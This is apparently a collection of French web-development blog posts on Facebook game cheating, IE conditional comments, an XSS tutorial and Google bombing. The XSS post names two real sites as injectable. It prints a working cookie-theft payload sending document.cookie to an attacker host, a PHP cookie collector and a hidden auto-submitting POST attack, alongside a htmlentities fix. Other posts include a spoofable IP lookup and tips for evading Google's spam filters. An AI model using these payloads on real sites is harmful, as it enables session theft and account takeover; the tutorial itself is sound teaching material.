function click_me(element) {
	try { // ie
		document.getElementById(element).click();
	}
	catch(e) {
		var evt = document.createEvent("MouseEvents"); // creates mouse event
		evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);  // inits mouse event
		var cb = document.getElementById(element); // gets element
		cb.dispatchEvent(evt);  // sends event to element
	}
}

A l’appel de la fonction un clique sera simulé sur l’évènement portant l’id passé en argument.

Toutefois, faites attention à ce que l’élément possède un attribut onclick, sans quoi aucune action ne sera exécutée.

Comment tricher au jeux « Le Défi du Clic » sur Facebook

A l’aide de l’extension Firebug, on peut ainsi s’amuser à tricher à certains jeux dont le but est de cliquer un maximum de fois sur un bouton dans un temps limité.

Une fois le code source édité, on obtient le score voulu…

Le jeu, développé en JavaScript se joue avec les flêches directionnelles du clavier et le résultat est assez impressionnant. Le fond sonore est toutefois géré en flash. C’est la première fois que Google remplace son logo par un logo « interactif ».

Voici le sprite du Pacman:

Et voici une version extraite de Google Pacman que j’ai récupéré depuis les sources, qui est également disponible à cette adresse:

Symfony est un framework MVC libre écrit en PHP 5. En tant que framework, il facilite et accélère le développement de sites et d’applications Internet et Intranet.

Aujourd’hui je vous propose de découvrir un récapitulatif des principales commandes Symfony disponibles en français au format JPEG et PDF. Comme ça plus de trous de mémoire .

Pour Symfony 1.4

Pour les anciennes versions de Symfony

Vous trouverez d’autres anti-sèches concernant ce framework à cette adresse.

Considéré comme le père des logiciels libres, Richard Stallman est à l’origine en autres du projet GNU (et la Free Software Fundation) et de la licence GPL.

Je serai personnellement présent à cette conférence (c’est pas tous les jours qu’une telle personnalité du monde de l’informatique se rend dans ma ville). Pour les intéressés la conférence débute vers 18h30 et aura lieu au Grand amphithéâtre de l’Université Lyon 2 et sera en français.

Cet outil utilise la fonction htmlentities() de PHP.

Cliquez ici pour accéder au convertisseur

<?php
function get_ip(){
	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
		return $_SERVER['HTTP_X_FORWARDED_FOR'];
	elseif(isset($_SERVER['HTTP_CLIENT_IP']))
		return $_SERVER['HTTP_CLIENT_IP'];
	else
		return $_SERVER['REMOTE_ADDR'];
}
?>

Il est souvent difficile de rendre un design compatible sur tous les navigateurs, surtout sur IE 6 et ses versions antérieurs. Heureusement, il existe des astuces pour appliquer des « patchs » à Internet Explorer. On utilise souvent des commentaires conditionnels ou alors des hacks CSS pour adapter les feuilles de style au moteur de rendu du navigateur.

Les commentaires conditionnels pour IE

Les commentaires conditionnels sont des commentaires (X)HTML standards ayant une syntaxe particulière. Ils ne sont interprétés que par Internet Explorer ou une version ciblée de ce dernier, les autres navigateurs les interprètent comme de simples commentaires. Bien entendu ils peuvent être aussi bien mis dans la balise <body> que dans la balise <head>

Syntaxe pour viser toutes les versions d’IE

<!--[if IE]>
	Code HTML interprété par IE
<![endif]-->

Syntaxe pour viser une ou plusieurs versions d’IE

<!--[if comparaison IE version]>
	Code HTML interprété par une ou plusieurs versions d'IE
<![endif]-->

La comparaison peut prendre les valeurs suivantes :

• gt pour >
• gte pour ≥
• lt pour <
• lte pour ≤
• aucune valeur n’est requise pour le signe égal
• ! pour prendre en compte toutes les versions d’IE sauf celle indiquée

Les commentaires conditionnels sont compris par Internet Explorer depuis IE 5.0.

La version du navigateur peut prendre les valeurs suivantes :

• 5.0
• 5.5000
• 6
• 7
• 8
• etc

Exemple:

<!-- Pour IE 6 uniquement -->
<!--[if IE 6]>
	<link href="/ie6.css" rel="stylesheet" media="screen" type="text/css" />
<![endif]-->

<!-- Pour IE 5 et IE 5.5 -->
<!--[if lt IE 6]>
	<script type="text/javascript">alert('Merci de mettre a jour votre navigateur!');
	document.location.href='http://fr.www.mozilla.com/fr/?flang=fr';</script>
<![endif]-->

<!-- Pour IE plus grand ou égale à 7 -->
<!--[if gte IE 7]>
	<link href="/ie_superieur_egale_a_7.css" rel="stylesheet" media="screen" type="text/css" />
<![endif]-->

Astuce bonus

Nous avons vu comment montrer du code HTML à IE mais nous n’avons pas vu comment le lui cacher.

<!--[if !IE]>-->
	<style type="text/css">
	p:first-letter {
		font-weight:bold;
	}
	</style>
<!--<![endif]-->

Vous remarquerez que la syntaxe change légèrement. Le code HTML n’est plus dans un commentaire.

Hacks CSS

Personnellement je vous déconseille l’utilisation des hacks pour plusieurs raisons :

• Leur syntaxe est souvent « tirée par les cheveux »
• Certains ne sont pas valides W3C
• Il est plus propre de mettre les correctifs pour les versions d’IE concernés dans des feuilles de style à part

Si toutefois vous en avez besoin, je vous conseille d’aller voir ce tableau qui répertorie la plupart des hacks CSS.

Comment rendre ses PNG transparents sur IE6

Le format d’image (.png) est de plus en plus répandu sur le web. Le problème étant que IE6 ne gère pas la transparence de ce dernier, à la place vous avez droit à un beau fond gris. Toutefois des astuces en JavaScript existent.

Tester un design sur les anciennes versions de IE

Pour vérifier que votre site soit compatible sur les anciennes versions d’Internet Explorer je vous recommande IE Tester.

Pour ceux qui n’ont pas Windows, je leur conseille netrenderer ou encore browsershot.org. Ils prennent des screenshots de votre sites et vous les renvoient. Si cette solution ne vous convient pas il y’a toujours la virtualisation ou l’émulation.

Cross site scripting, abrégé XSS – pour ne pas être confondu avec Counter Strike Source Cascading Style Sheets (CSS) – est un type de faille de sécurité qu’on trouve assez souvent sur les sites internet.

Note: X est une abréviation pour « cross » (croix en anglais)

Cette faille permet à n’importe qui d’injecter du code malveillant (souvent en langage JavaScript) dans une page du site pour le faire exécuter par le navigateur de la victime.

Risques d’une faille XSS

Comme vous pouvez le constater les risques sont multiples:

• Vol de cookies et de sessions (la plupart du temps pour usurper une identité)
• Propagation d’un virus (cf. Virus Samy de MySpace)
• Redirection de la page, souvent de manière transparente
• Phishing (hameçonnage)
• Plantage du navigateur, avec une boucle infinie par exemple, fork bomb etc

Comment déceler une faille XSS ?

Pour savoir si un site internet a un trou XSS il faut trouver un moyen d’injecter du code Javascript dans la page. La plupart du temps il suffit de vérifier que les caractères tels que les guillemets simples, doubles et les chevrons ne soient pas transformés en leur entité HTML à l’affichage de la page.
Je dis bien la plupart du temps car il m’est arrivé de tomber sur un site où une variable GET était directement affichée entre les balises <script> (voir le deuxième exemple)

Voici deux exemples des sites ayant une faille XSS qui illustrent bien ce que je viens de dire. On peut injecter du JavaScript dans leurs champs de recherche:

• (Etudiants et développement) http://www.etudiantsetdeveloppement.org/
  Exemple de code à injecter:
  <script>alert(document.cookie)</script>
• (Ville de Lyon) http://www.lyon.fr/
  Exemple de code à injecter: '; alert('Faille XSS détectée'); var unevar='

Note: Ces sites ont été choisis complètement au hasard. Pour les trouver il suffit de faire une recherche dans Google sur les termes « site » et « site développé par stagiaire » ^^

L’exploit d’une faille XSS

Théorie

Bien entendu, les deux exemples ci-dessus n’exploitent pas la faille car le script n’est exécuté que par votre navigateur.

Pour exécuter un script malveillant sur l’ordinateur de la victime l’attaquant a le choix:

• Soit les données non protégées sont directement insérées dans la BDD, dans ce cas il n’y rien à faire à part les soumettre et attendre que la victime exécute le script
• Soit les données non protégées sont accessibles depuis une méthode GET, dans ce cas il peut communiquer le lien piégé à la victime en utilisant souvent l’ingénierie sociale
• Soit les données non protégées sont accessibles depuis une méthode POST, dans ce cas l’attaquant peut faire soumettre à la victime un formulaire avec le code malveillant. La soumission peut se faire de manière transparente. Là encore il faut utiliser l’ingénierie sociale si la personne est ciblée

Comment créer une faille XSS ?

Supposons qu’une personne malveillante (appelons la John) veuille récupérer les cookies d’un site dont vous êtes webmaster.

Supposons que vous ayez développé un petit site avec un backoffice pour gérer le contenu et que malencontreusement vous ayez fait l’erreur suivante:

<h2 id="recherche">Rechercher...</h2>
<form action="" method="get"><div>
	<input type="text" name="search" value="<?php if(isset($_GET['search']))
		echo stripslashes($_GET['search']) ?>" />
	<input type="submit" value="OK" />
</div></form>

Note: J’ai utilisé la fonction stripslashes() en supposons que les magic quotes soient activées

Ceci est un formulaire contenant un champ de recherche. Lorsque vous faites une recherche, une variable nommée search se crée sur la page, elle contient le texte que le visiteur vient de taper. Pour plus d’accessibilité nous remettons le contenu recherché dans le champ de recherche.

En faisant cela on a créé une faille XSS parce qu’on ne convertit pas les entités HTML au niveau de l’affichage (l’endroit où les données non protégées sont affichées importe peu).

Comment exploiter une faille XSS ?

Pour exploiter la faille John peut vous piégez en vous envoyant un lien de votre site intégrant du code malveillant. Le script malveillant s’affichera dans le code source de votre page tel qu’il est sans être paralysé et John pourra donc y injecter du JavaScript.

Voici le code à injecter pour exploiter la faille ouverte ci-dessus:

bidule" />
<script>document.getElementById('recherche').style.background = "url('http://site-malveillant.com/xss/file.php?c="+ document.cookie +"')"</script>
<input type="hidden" name="a

• Ligne 1 et ligne 3, nous paralysons l’attribut value de la balise input
• Ligne 2, nous injectons du code JavaScript qui redirige les cookies de la victime vers le site malveillant de manière transparente

La victime ne se rend compte de rien, elle croit avoir fait une recherche sur le terme que le pirate lui a envoyé (ici bidule), mais au fait elle vient de se faire voler ses cookies.

Note: Seuls les cookies se référant au site sont volés

Techniquement, le code JavaScript va appliquer une image de fond transparente à la <div> du formulaire. Cette image, il va aller la chercher sur un site externe en passant en paramètre les cookies du visiteur.

Voyons maintenant comment John récupère vos cookies. Voici un exemple de code source de la page file.php à laquelle le script fait appel:

<?php
$filename = 'cookies.txt';
if(isset($_GET["c"])) { //c comme Cookie
	@file_put_contents($filename, date("\L\e d/m/y \a H\h i\m s\s >  "). $_GET["c"] .
		"\r\n", FILE_APPEND | LOCK_EX);
	@mail('prenom@monsite.com', 'XSS', 'Le poisson a mordu !');
}	

header ("Content-type: image/gif");
$img = imagecreate(1, 1);
$color = imagecolorallocate($img, 255, 255, 255);
$transparent = imagecolortransparent($img, $color);
imagegif($img);
?>

• Ce script enregistre les cookies passés en paramètre dans un fichier texte que John peut consulter
• Un mail est envoyé à John dès que le script est exécuté
• Enfin, la page renvoi une image transparente de 1px² qui sera appliquée à la propriété CSS background de l’id « recherche »

Exemple de résultat du fichier cookies.txt après exécution du script

Le 29/07/09 a 13h 26m 07s >  login=Gerard; password=r6AAQng0
Le 29/07/09 a 13h 28m 15s >  login=admin; password=Qfg56dzeT

Il ne suffit à John qu’à reforger les cookies avec leurs valeurs et le nom de domaine du site pour accéder au backoffice. Pour ce genre d’opérations des plugins Firefox existent.

Exploiter une faille XSS via la méthode POST

Jusqu’ici nous avons vu comment s’exploite une faille XSS via la méthode GET, mais si le formulaire précédent était en POST ?

Au lieu d’injecter le code directement dans l’adresse de la page, John va devoir faire soumettre un formulaire à la victime, avec la méthode POST.

Pour cela il va mettre en ligne une page html (ou deux si il est intelligent) avec le code suivant:

Note: Je ne me concentre que sur le code qui est entre les balises <body>

<form action="http://www.site-victime.com/recherche.php" method="post" name="form">
	<div style="display:none">
		<textarea name="search">bidule&quot; /&gt;
&lt;script&gt;document.getElementById(&#039;recherche&#039;).style.background = &quot;url(&#039;http://s-c.fr/xss/file.php?c=&quot;+ document.cookie +&quot;&#039;)&quot;&lt;/script&gt;
&lt;input type=&quot;hidden&quot; name=&quot;a</textarea>
		<input type="submit" value="ok" />
	</div>
</form>
<!-- Soumission automatique en JavaScript -->
<script type="text/javascript">document.forms['form'].submit()</script>

Le code ci-dessus aura pour but de rediriger la victime sur son site en injectant du code JavaScript en POST

<h1>Bienvenue</h1>
<p>Bla bla bla...</p>
<!-- Iframe qui inclue le page ayant le code précédent -->
<iframe src="iframe.html" width="0" height="0" scrolling="no" frameborder="0"></iframe>

Le code ci-dessus a pour but de dissimuler le page précédente a l’intérieur d’un contenu que John aura pris le soin de rédiger. De cette façon la soumission du formulaire sera faite de manière complètement transparente (autant dire que là vous êtes dans la ***** ^^)

Comment se protéger des failles XSS ?

Rien de plus simple, il suffit de substituer les caractères spéciaux à leurs valeurs html.

En PHP il existent des fonctions spécialement conçues. Je peux par exemple citer htmlentities ou encore htmlspecialchars.

function convert($code) {
	return htmlentities($code, ENT_QUOTES, 'UTF-8');
}

Si vous êtes parano très très prudent, pensez à désactiver le JavaScript de votre navigateur, bien que cette solution soit un peu radicale…

Conclusion

Nous venons de faire un petit tout d’horizon sur les failles XSS. Je n’ai détaillé que plusieurs exemples tout en essayant d’être le plus clair et le plus complet possible mais vous avez, je l’espère, compris le principe. Sachez tout de même que beaucoup de développeurs pensent, à tort, que les failles XSS ne sont pas très importantes…

Le fonctionnement

Les principaux moteurs de recherches accordent un poids au texte de l’hyperlien qui pointe vers un site. Si plusieurs sites utilisent le même texte pour pointer vers une adresse URL, Google additionne ce poids. Il devient ainsi possible de faire apparaître la page cible dans les premiers résultats d’une recherche en tapant le texte qui a servi aux liens. Ce texte, choisi librement, n’a pas forcément de rapport avec le contenu du site cible.

Vous comprenez sans doutes mieux le rôle qu’il y a de créer liens de partenariat avec d’autres sites…

Réalisation

Supposons que vous souhaitez référencez votre site sur le terme suivant « je suis le premier« . En utilisant la technique de Google Bombing, vous allez devoir créer le lien suivant:

<a href="http://monsite.fr" title="je suis premier !">je suis le premier</a>

Vous demandez à plusieurs amis webmasters, blogueurs d’insérer ce lien dans une de leur page. Le but est d’essayer de diffuser votre lien sur le plus de sites possibles.

Quelques exemples

Voici quelques exemples d’actualité réalisés à l’aide de cette technique:

• Si vous essayez de taper dans Google « Trouver Chuck Norris » et que vous cliquez sur le bouton « J’ai de la chance » vous serez redirigez vers un site assez comique qui usurpe la charte graphique de Google.
• Un autre exemple d’actualité est le site de Nicolas Sarkozy. En effet l’expression « trou du cul du web » renvoie vers le site vitrine du président
• Le même phénomène a été observé avec George W. Bush qui a été associé à l’expression « worst failure ever« . La recherche renvoie vers le site internet de la maison blanche

Google lutte contre le bombing

Le moteur de recherche devient une machine de plus en plus intelligente qu’il est téméraire de vouloir tromper. Début 2007, Google met en place un nouvel algorithme pour limiter cette pratique qui prenait de l’ampleur. Si l’algorithme fonctionne pour quelques exemples, certains parviennent tout de même à passer à travers les mailles du filet.

Comment éviter de se faire censurer par Google ?

Il semblerait que le fait de varier légèrement les mots-clés et les cibler vers plusieurs pages internes du site permette d’éviter l’ensemble des filtres anti-spam que Google met progressivement en place.

En voici une autre prise sur ça va couper.fr